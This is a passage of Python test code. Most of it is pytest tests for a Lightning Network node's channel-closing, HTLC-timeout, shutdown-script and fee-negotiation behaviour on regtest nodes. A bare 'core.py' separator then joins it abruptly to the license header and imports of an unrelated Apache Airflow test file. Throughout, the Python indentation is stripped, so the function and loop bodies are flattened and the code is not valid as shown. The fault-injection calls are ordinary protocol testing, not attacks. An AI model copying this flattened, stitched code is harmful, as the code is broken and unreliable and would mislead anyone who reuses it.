nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are at depths 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects,
feerates=(7500, 7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.daemon.wait_for_log('Handed peer, entering loop')
l2.fundchannel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# Now, 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:.*\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 after l1 sees tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
# Now, 100 blocks l2 should be done.
bitcoind.generate_block(5)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Check that the all the addresses match what we generated ourselves:
for o in l1.rpc.listfunds()['outputs']:
txout = bitcoind.rpc.gettxout(o['txid'], o['output'])
addr = scriptpubkey_addr(txout['scriptPubKey'])
assert(addr == o['address'])
addr = l1.bitcoin.getnewaddress()
l1.rpc.withdraw(addr, "all")
@pytest.mark.developer("needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not node_factory.valgrind:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.lightning_dir, leaks))
l1.rpc.stop()
@flaky
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_option_upfront_shutdown_script(node_factory, bitcoind, executor):
# There's a workaround in channeld, that it treats incoming errors
# before both sides are locked in as warnings; this happens in
# this test, so l1 reports the error as a warning!
l1 = node_factory.get_node(start=False, allow_warning=True)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 1000000, False)
# This will block, as l12 will send an error but l2 will retry.
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
fut.result(TIMEOUT)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
# Works when l2 closes channel, too.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 1000000, False)
l2.rpc.close(l1.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
# Figure out what address it will try to use.
keyidx = int(l1.db_query("SELECT intval FROM vars WHERE name='bip32_max_index';")[0]['intval'])
# Expect 1 for change address, plus 1 for the funding address of the actual
# funding tx.
addr = l1.rpc.call('dev-listaddrs', [keyidx + 2])['addresses'][-1]
# the above used to be keyidx + 3, but that was when `fundchannel`
# used the `txprepare`-`txdiscard`-`txprepare` trick, which skipped
# one address in the discarded tx.
# Now we use PSBTs, which means we never discard and skip an address.
# Now, if we specify upfront and it's OK, all good.
l1.stop()
# We need to prepend the segwit version (0) and push opcode (14).
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = '0014' + addr['bech32_redeemscript']
l1.start()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 1000000)
l1.rpc.close(l2.info['id'])
wait_for(lambda: sorted([c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']]) == ['CLOSINGD_COMPLETE', 'ONCHAIN', 'ONCHAIN'])
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_invalid_upfront_shutdown_script(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, fundchannel=False)
l1 = node_factory.get_node(start=False, allow_warning=True)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac00"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
l1.fundchannel(l2, 1000000, False)
@pytest.mark.developer("needs to set upfront_shutdown_script")
@pytest.mark.slow_test
def test_segwit_shutdown_script(node_factory, bitcoind, executor):
"""
Try a range of future segwit versions as shutdown scripts. We create many nodes, so this is quite slow under valgrind
"""
l1 = node_factory.get_node(allow_warning=True)
# BOLT #2:
# 5. if (and only if) `option_shutdown_anysegwit` is negotiated:
# * `OP_1` through `OP_16` inclusive, followed by a single push of 2 to 40 bytes
# (witness program versions 1 through 16)
edge_valid = ['51020000', '5128' + '00' * 0x28,
'60020000', '6028' + '00' * 0x28]
other_valid = ['52020000', '5228' + '00' * 0x28,
'53020000', '5328' + '00' * 0x28,
'54020000', '5428' + '00' * 0x28,
'55020000', '5528' + '00' * 0x28,
'56020000', '5628' + '00' * 0x28,
'57020000', '5728' + '00' * 0x28,
'58020000', '5828' + '00' * 0x28,
'59020000', '5928' + '00' * 0x28,
'5A020000', '5A28' + '00' * 0x28,
'5B020000', '5B28' + '00' * 0x28,
'5C020000', '5C28' + '00' * 0x28,
'5D020000', '5D28' + '00' * 0x28,
'5E020000', '5E28' + '00' * 0x28,
'5F020000', '5F28' + '00' * 0x28]
invalid = ['50020000', # Not OP_1-OP_16
'61020000', # Not OP_1-OP_16
'5102000000', # Extra bytes
'510100', # Too short
'5129' + '00' * 0x29] # Too long
# Don't stress CI; just test edge cases
if SLOW_MACHINE:
valid = edge_valid
else:
valid = edge_valid + other_valid
# More efficient to create them all up-front.
nodes = node_factory.get_nodes(len(valid) + len(invalid))
# Give it one UTXO to spend for each node.
addresses = {}
for n in nodes:
addresses[l1.rpc.newaddr()['bech32']] = (10**6 + 100000) / 10**8
bitcoind.rpc.sendmany("", addresses)
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == len(addresses))
# FIXME: Since we don't support other non-v0 encodings, we need a protocol
# test for this (we're actually testing our upfront check, not the real
# shutdown one!),
for script in valid:
# Insist on upfront script we're not going to match.
l1.stop()
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
l1.start()
l2 = nodes.pop()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
for script in invalid:
# Insist on upfront script we're not going to match.
l1.stop()
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
l1.start()
l2 = nodes.pop()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
l1.rpc.fundchannel(l2.info['id'], 10**6)
@unittest.skipIf(not EXPERIMENTAL_FEATURES, "Needs anchor_outputs")
@pytest.mark.developer("needs to set dev-disconnect")
def test_closing_higherfee(node_factory, bitcoind, executor):
"""With anchor outputs we can ask for a *higher* fee than the last commit tx"""
# We change the feerate before it starts negotiating close, so it aims
# for *higher* than last commit tx.
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'feerates': (7500, 7500, 7500, 7500),
'disconnect': ['-WIRE_CLOSING_SIGNED']},
{'may_reconnect': True,
'dev-no-reconnect': None,
'feerates': (7500, 7500, 7500, 7500)}])
# This will trigger disconnect.
fut = executor.submit(l1.rpc.close, l2.info['id'])
l1.daemon.wait_for_log('dev_disconnect')
# Now adjust fees so l1 asks for more on reconnect.
l1.set_feerates((30000,) * 4, False)
l2.set_feerates((30000,) * 4, False)
l1.restart()
l2.restart()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# This causes us to *exceed* previous requirements!
l1.daemon.wait_for_log(r'deriving max fee from rate 30000 -> 16440sat \(not 1000000sat\)')
# This will fail because l1 restarted!
with pytest.raises(RpcError, match=r'Channel forgotten before proper close.'):
fut.result(TIMEOUT)
# But we still complete negotiation!
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
wait_for(lambda: only_one(l2.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
@pytest.mark.developer("needs dev_disconnect")
def test_htlc_rexmit_while_closing(node_factory, executor):
"""Retranmitting an HTLC revocation while shutting down should work"""
# l1 disconnects after sending second COMMITMENT_SIGNED.
# Then it stops receiving after sending WIRE_SHUTDOWN (which is before it
# reads the revoke_and_ack).
disconnects = ['+WIRE_COMMITMENT_SIGNED*2',
'xWIRE_SHUTDOWN']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects},
{'may_reconnect': True,
'dev-no-reconnect': None}])
# Start payment, will disconnect
l1.pay(l2, 200000)
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['connected'] is False)
# Tell it to close (will block)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# Original problem was with multiple disconnects, but to simplify we make
# l2 send shutdown too.
fut2 = executor.submit(l2.rpc.close, l1.info['id'])
# Reconnect, shutdown will continue disconnect again
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# Now l2 should be in CLOSINGD_SIGEXCHANGE, l1 still waiting on
# WIRE_REVOKE_AND_ACK.
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CHANNELD_SHUTTING_DOWN'
# They don't realize they're not talking, so disconnect and reconnect.
l1.rpc.disconnect(l2.info['id'], force=True)
# Now it hangs, since l1 is expecting rexmit of revoke-and-ack.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
fut2.result(TIMEOUT)
@pytest.mark.openchannel('v1')
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel(node_factory, executor):
"""Ideally you'd keep talking to us about closed channels: simple"""
disconnects = ['@WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None},
{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects}])
l1.pay(l2, 200000)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 considers the closing done, l1 does not
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'
# l1 reconnects, it should succeed.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel_onchain(node_factory, bitcoind, executor):
"""Ideally you'd keep talking to us about closed channels: even if close is mined"""
disconnects = ['@WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None},
{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects}])
l1.pay(l2, 200000)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 considers the closing done, l1 does not
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'
# l1 does not see any new blocks.
def no_new_blocks(req):
return {"result": {"blockhash": None, "block": None}}
l1.daemon.rpcproxy.mock_rpc('getrawblockbyheight', no_new_blocks)
# Close transaction mined
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'ONCHAIN')
# l1 reconnects, it should succeed.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
@pytest.mark.developer("too slow without fast polling for blocks")
def test_segwit_anyshutdown(node_factory, bitcoind, executor):
"""Try a range of future segwit versions for shutdown"""
l1, l2 = node_factory.line_graph(2, fundchannel=False)
l1.fundwallet(10**7)
# Based on BIP-320, but all changed to regtest.
addrs = ("BCRT1QW508D6QEJXTDG4Y5R3ZARVARY0C5XW7KYGT080",
"bcrt1qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3qzf4jry",
"bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56",
"BCRT1SW50QT2UWHA",
"bcrt1zw508d6qejxtdg4y5r3zarvaryv2wuatf",
"bcrt1qqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvseswlauz7",
"bcrt1pqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvsesyga46z",
"bcrt1p0xlxvlhemja6c4dqv22uapctqupfhlxm9h8z3k2e72q4k9hcz7vqc8gma6")
for addr in addrs:
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
# If we don't actually make a payment, two of the above cases fail
# because the resulting tx is too small! Balance channel so close
# has two outputs.
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: any([c['state'] == 'CHANNELD_NORMAL' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
l1.pay(l2, 10**9 // 2)
l1.rpc.close(l2.info['id'], destination=addr)
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: all([c['state'] == 'ONCHAIN' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
@pytest.mark.developer("needs to manipulate features")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
def test_anysegwit_close_needs_feature(node_factory, bitcoind):
"""Rather than have peer reject our shutdown, we should refuse to shutdown toa v1+ address if they don't support it"""
# L2 says "no option_shutdown_anysegwit"
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True},
{'may_reconnect': True,
'dev-force-features': -27}])
with pytest.raises(RpcError, match=r'Peer does not allow v1\+ shutdown addresses'):
l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
# From TFM: "Tell your friends to upgrade!"
l2.stop()
del l2.daemon.opts['dev-force-features']
l2.start()
# Now it will work!
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
wait_for(lambda: only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
bitcoind.generate_block(1, wait_for_mempool=1)
def test_close_feerate_range(node_factory, bitcoind, chainparams):
"""Test the quick-close fee range negotiation"""
l1, l2 = node_factory.line_graph(2)
notifications = []
def save_notifications(message, progress, request, **kwargs):
notifications.append(message)
# Lowball the range here.
with l1.rpc.notify(save_notifications):
l1.rpc.close(l2.info['id'], feerange=['253perkw', 'normal'])
if not chainparams['elements']:
l1_range = [138, 4110]
l2_range = [1027, 1000000]
else:
# That fee output is a little chunky.
l1_range = [175, 5212]
l2_range = [1303, 1000000]
l1.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l1_range[0], l1_range[1]))
l2.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l2_range[0], l2_range[1]))
overlap = [max(l1_range[0], l2_range[0]), min(l1_range[1], l2_range[1])]
l1.daemon.wait_for_log('performing quickclose in range {}sat-{}sat'.format(overlap[0], overlap[1]))
log = l1.daemon.is_in_log('Their actual closing tx fee is .*sat')
rate = re.match('.*Their actual closing tx fee is ([0-9]*sat).*', log).group(1)
assert notifications == ['Sending closing fee offer {}, with range {}sat-{}sat'.format(rate,
l1_range[0],
l1_range[1]),
'Received closing fee offer {}, with range {}sat-{}sat'.format(rate,
l2_range[0],
l2_range[1])]
def test_close_twice(node_factory, executor):
# First feerate is too low, second fixes it.
l1, l2 = node_factory.line_graph(2, opts=[{'allow_warning': True,
'may_reconnect': True},
{'allow_warning': True,
'may_reconnect': True,
'feerates': (15000, 15000, 15000, 15000)}])
# This makes it disconnect, since feerate is too low.
fut = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '500perkw'])
l1.daemon.wait_for_log('WARNING.*Unable to agree on a feerate')
fut2 = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '15000perkw'])
# Now reconnect, it should work.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
assert fut.result(TIMEOUT)['type'] == 'mutual'
assert fut2.result(TIMEOUT)['type'] == 'mutual'
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from freezegun import freeze_time
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
configuration.load_test_config()
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
